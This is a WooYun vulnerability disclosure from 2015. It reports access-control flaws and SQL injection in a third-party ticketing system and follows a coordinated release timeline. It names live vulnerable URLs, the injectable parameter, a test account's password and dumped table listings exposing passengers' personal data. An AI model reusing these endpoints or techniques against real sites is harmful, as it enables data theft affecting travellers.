当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0101951

漏洞标题:第三方某售票系统通用型越权和两处SQL注入泄露大量订单信息(姓名、手机、证件号、航班号和起飞时间等)

相关厂商:第三方某售票系统

漏洞作者: HackBraid

提交时间:2015-03-17 22:20

修复时间:2015-06-18 17:44

公开时间:2015-06-18 17:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-17: 细节已通知厂商并且等待厂商处理中
2015-03-20: 厂商已经确认,细节仅向厂商公开
2015-03-23: 细节向第三方安全合作伙伴开放
2015-05-14: 细节向核心白帽子及相关领域专家公开
2015-05-24: 细节向普通白帽子公开
2015-06-03: 细节向实习白帽子公开
2015-06-18: 细节向公众公开

简要描述:

RT
越权泄露大量敏感信息
SQL注入漏洞,不需登陆

详细说明:

http://www.piaoyou.org/case_web.htm 票友软件的case
注册账户登录,发现存在越权和大量SQL注入,可以查看大量订单信息
注入都是查询表单引发的:
注入1:

/Json_db/other_report.aspx?its=1&stype=&dfs=0&sdate=2015-3-17&edate=2015-3-17&fs=&keyword=1&col=id,subject,name,kefu,sales,hc,hb,qforder,total,ysmoney,stype,sdate,content&_search=false&nd=1426583717093&rows=25&page=1&sidx=id&sord=desc


注入2:

/Json_db/flight_search.aspx?stype=&ptype=&ddw=1&sdate=2015-3-17&edate=2015-3-17&fs=&keyword=&_search=false&nd=1426585534292&rows=18&page=1&sidx=id&sord=desc


漏洞证明:

都是机票查询处,下面列举票友上的案例,参数都是stype引起的
1.http://www.8800000.com/member/pnr.aspx?stype=0 这个需要注册个会员号18202657883密码也是18202657883

p.jpg


一开始界面没啥问题,给stype参数后加个'有意外发现,1W多的订单信息都可以遍历了:

p1.jpg


都是刚支付的,还没起飞

p2.jpg


2.http://www.h-h.com.cn/Json_db/other_report.aspx?its=1&stype=&dfs=0&sdate=2015-3-17&edate=2015-3-17&fs=&keyword=1&col=id,subject,name,kefu,sales,hc,hb,qforder,total,ysmoney,stype,sdate,content&_search=false&nd=1426583717093&rows=25&page=1&sidx=id&sord=desc

Database: haihua_pek
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.money_mx | 131787 |
| dbo.sfkmx_view | 123886 |
| dbo.pnr_history | 118708 |
| dbo.pnr_history | 118708 |
| dbo.pnrdetail | 59132 |
| dbo.view_scgq | 59132 |
| dbo.viewbmpnr | 59132 |
| dbo.view_js | 57321 |
| dbo.viewpnr | 37427 |
| dbo.Hotel_LandMarks | 28601 |
| dbo.pay_money_main | 19497 |
| dbo.pay_money_main | 19497 |
| dbo.view_pay_mx_main | 19497 |
| dbo.cjr_login | 18873 |
| dbo.soupiaoren | 18873 |
| dbo.viewcjr | 18873 |
| dbo.Hotel_StaticInfos | 13442 |
| dbo.sfkmx_other_view | 7901 |
| dbo.ft_City | 5865 |
| dbo.view_tuipiao | 4614 |
| dbo.tuipiao | 4602 |
| dbo.member_yu | 4195 |
| dbo.view_member_yu | 4195 |
| dbo.ft_TAPrice | 4063 |
| dbo.traininfo | 2204 |
| dbo.yc_group | 1303 |
| dbo.System_Warn | 1104 |
| dbo.aircity | 1070 |
| dbo.Roles_flag | 1045 |
| dbo.Roles_flag | 1045 |
| dbo.Hotel_City | 621 |
| dbo.Hotel_City | 621 |
| dbo.sms_key | 468 |
| dbo.sms_key | 468 |
| dbo.xcd_ps_main | 454 |
| dbo.sfk_submit_mx | 405 |
| dbo.sfk_submit_mx | 405 |
| dbo.money_other | 337 |
| dbo.pay_money_other | 337 |
| dbo.company_clk | 313 |
| dbo.viewother | 307 |
| dbo.piaobei | 204 |
| dbo.cw_gd | 189 |
| dbo.airpiao | 186 |
| dbo.tourday | 185 |
| dbo.Airways | 183 |
| dbo.sys_nav | 135 |
| dbo.Visor | 131 |
| dbo.books | 116 |
| dbo.salestable | 76 |
| dbo.Tplanetype | 50 |
| dbo.air_cab_class | 49 |
| dbo.air_cab_class | 49 |
| dbo.menu_s | 44 |
| dbo.tourlist | 41 |
| dbo.plane_xinhao | 35 |
| dbo.orders_design | 32 |
| dbo.Bank | 28 |
| dbo.contact_info | 28 |
| dbo.Notebook | 26 |
| dbo.oa_item | 26 |
| dbo.view_kefu | 24 |
| dbo.Hotel_PageSumInfo | 20 |
| dbo.bm_login | 19 |
| dbo.company_bm | 19 |
| dbo.gjticket | 19 |
| dbo.viewgjticket | 19 |
| dbo.tournews | 18 |
| dbo.bx_base | 16 |
| dbo.link | 16 |
| dbo.cwkou | 15 |
| dbo.tourline | 15 |
| dbo.company_flag | 14 |
| dbo.payfs | 14 |
| dbo.bx_product | 13 |
| dbo.menu_b | 13 |
| dbo.resms | 12 |
| dbo.cgimg | 10 |
| dbo.otherclass | 10 |
| dbo.cjrcard | 9 |
| dbo.jbitem | 9 |
| dbo.system_tx | 9 |
| dbo.travel_money | 8 |
| dbo.kefubm | 6 |
| dbo.Report_mb_member | 6 |
| dbo.Report_mb_member | 6 |
| dbo.wtgroup | 6 |
| dbo.ptype_set | 5 |
| dbo.shop_smallclass | 5 |
| dbo.wttgclass | 5 |
| dbo.b2b_users | 4 |
| dbo.company_center | 4 |
| dbo.tourclass | 4 |
| dbo.travel_order_detail | 4 |
| dbo.travel_order_detail | 4 |
| dbo.view_travel_order | 4 |
| dbo.message_mb | 3 |
| dbo.tourbig | 3 |
| dbo.fax_submit | 2 |
| dbo.Invoice | 2 |
| dbo.shop_bigclass | 2 |
| dbo.admin | 1 |
| dbo.ft_Config | 1 |
| dbo.OtherParm | 1 |
| dbo.System_info | 1 |
| dbo.travel_item | 1 |
+--------------------------------------------------+---------+
Database: master
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| sys.messages | 76640 |
| sys.sysmessages | 76640 |
| sys.syscolumns | 10759 |
| sys.all_parameters | 6761 |
| sys.system_parameters | 6761 |
| sys.trace_subclass_values | 4729 |
| sys.trace_event_bindings | 3965 |
| sys.all_columns | 3793 |
| sys.system_columns | 3749 |
| sys.syscomments | 2793 |
| dbo.spt_values | 2346 |
| sys.all_objects | 1779 |
| sys.sysobjects | 1779 |
| sys.system_objects | 1773 |
| sys.database_permissions | 1675 |
| sys.syspermissions | 1675 |
| sys.sysprotects | 1674 |
| sys.all_sql_modules | 1621 |
| sys.system_sql_modules | 1621 |
| sys.all_views | 286 |
| sys.system_views | 286 |
| sys.event_notification_event_types | 193 |
| sys.trace_events | 171 |
| sys.syscharsets | 114 |
| sys.allocation_units | 112 |
| sys.partitions | 101 |
| sys.system_components_surface_area_configuration | 99 |
| sys.xml_schema_facets | 97 |
| sys.xml_schema_components | 93 |
| sys.xml_schema_types | 77 |
| sys.trace_columns | 65 |
| sys.configurations | 63 |
| sys.sysconfigures | 63 |
| sys.syscurconfigs | 63 |
| sys.fulltext_document_types | 50 |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES | 44 |
| INFORMATION_SCHEMA.COLUMNS | 44 |
| sys.columns | 44 |
| sys.syslanguages | 33 |
| sys.systypes | 27 |
| sys.types | 27 |
| sys.securable_classes | 21 |
| sys.trace_categories | 21 |
| sys.fulltext_languages | 17 |
| sys.xml_schema_component_placements | 17 |
| INFORMATION_SCHEMA.SCHEMATA | 14 |
| sys.database_principals | 14 |
| sys.schemas | 14 |
| sys.sysusers | 14 |
| sys.xml_schema_attributes | 14 |
| sys.server_principals | 11 |
| sys.service_contract_message_usages | 11 |
| sys.server_permissions | 7 |
| sys.sysindexes | 7 |
| sys.database_recovery_status | 6 |
| sys.databases | 6 |
| sys.indexes | 6 |
| sys.objects | 6 |
| sys.stats_columns | 6 |
| sys.stats_columns | 6 |
| sys.sysdatabases | 6 |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES | 5 |
| INFORMATION_SCHEMA.TABLES | 5 |
| sys.index_columns | 5 |
| sys.sysindexkeys | 5 |
| sys.tables | 5 |
| sys.endpoints | 4 |
| sys.service_queue_usages | 3 |
| sys.syssegments | 3 |
| sys.xml_schema_namespaces | 3 |
| sys.database_files | 2 |
| sys.login_token | 2 |
| sys.service_contract_usages | 2 |
| sys.sql_logins | 2 |
| sys.sysfiles | 2 |
| sys.syslogins | 2 |
| sys.user_token | 2 |
| dbo.spt_monitor | 1 |
| sys.data_spaces | 1 |
| sys.database_role_members | 1 |
| sys.default_constraints | 1 |
| sys.dm_exec_requests | 1 |
| sys.dm_exec_sessions | 1 |
| sys.filegroups | 1 |
| sys.server_role_members | 1 |
| sys.servers | 1 |
| sys.sysconstraints | 1 |
| sys.sysfilegroups | 1 |
| sys.sysmembers | 1 |
| sys.sysprocesses | 1 |
| sys.sysservers | 1 |
| sys.tcp_endpoints | 1 |
| sys.via_endpoints | 1 |
| sys.xml_schema_collections | 1 |
| sys.xml_schema_model_groups | 1 |
| sys.xml_schema_wildcards | 1 |
+--------------------------------------------------+---------+
Database: msdb
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.backupfile | 30 |
| dbo.backupmediafamily | 15 |
| dbo.backupmediaset | 15 |
| dbo.backupset | 15 |
+--------------------------------------------------+---------+


大量敏感信息:

p3.jpg


3.http://www.4008836868.com/Json_db/other_report.aspx?its=1&stype=&dfs=0&sdate=2015-3-17&edate=2015-3-17&fs=&keyword=1&col=id,subject,name,kefu,sales,hc,hb,qforder,total,ysmoney,stype,sdate,content&_search=false&nd=1426583717093&rows=25&page=1&sidx=id&sord=desc

s.jpg


4.http://hhcl.h-h.com.cn/Json_db/other_report.aspx?its=1&stype=&dfs=0&sdate=2015-3-17&edate=2015-3-17&fs=&keyword=1&col=id,subject,name,kefu,sales,hc,hb,qforder,total,ysmoney,stype,sdate,content&_search=false&nd=1426583717093&rows=25&page=1&sidx=id&sord=desc

s1.jpg


5.http://www.h-h.com.cn/Json_db/flight_search.aspx?stype=&ptype=&ddw=1&sdate=2015-3-17&edate=2015-3-17&fs=&keyword=&_search=false&nd=1426585534292&rows=18&page=1&sidx=id&sord=desc

s.jpg


6.http://www.4008836868.com/Json_db/flight_search.aspx?stype=&ptype=&ddw=1&sdate=2015-3-17&edate=2015-3-17&fs=&keyword=&_search=false&nd=1426585534292&rows=18&page=1&sidx=id&sord=desc

s2.jpg


7.http://hhcl.h-h.com.cn/Json_db/flight_search.aspx?stype=&ptype=&ddw=1&sdate=2015-3-17&edate=2015-3-17&fs=&keyword=&_search=false&nd=1426585534292&rows=18&page=1&sidx=id&sord=desc

s3.jpg

修复方案:

参数过滤下

版权声明:转载请注明来源 HackBraid@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2015-03-20 17:43

厂商回复:

最新状态:

暂无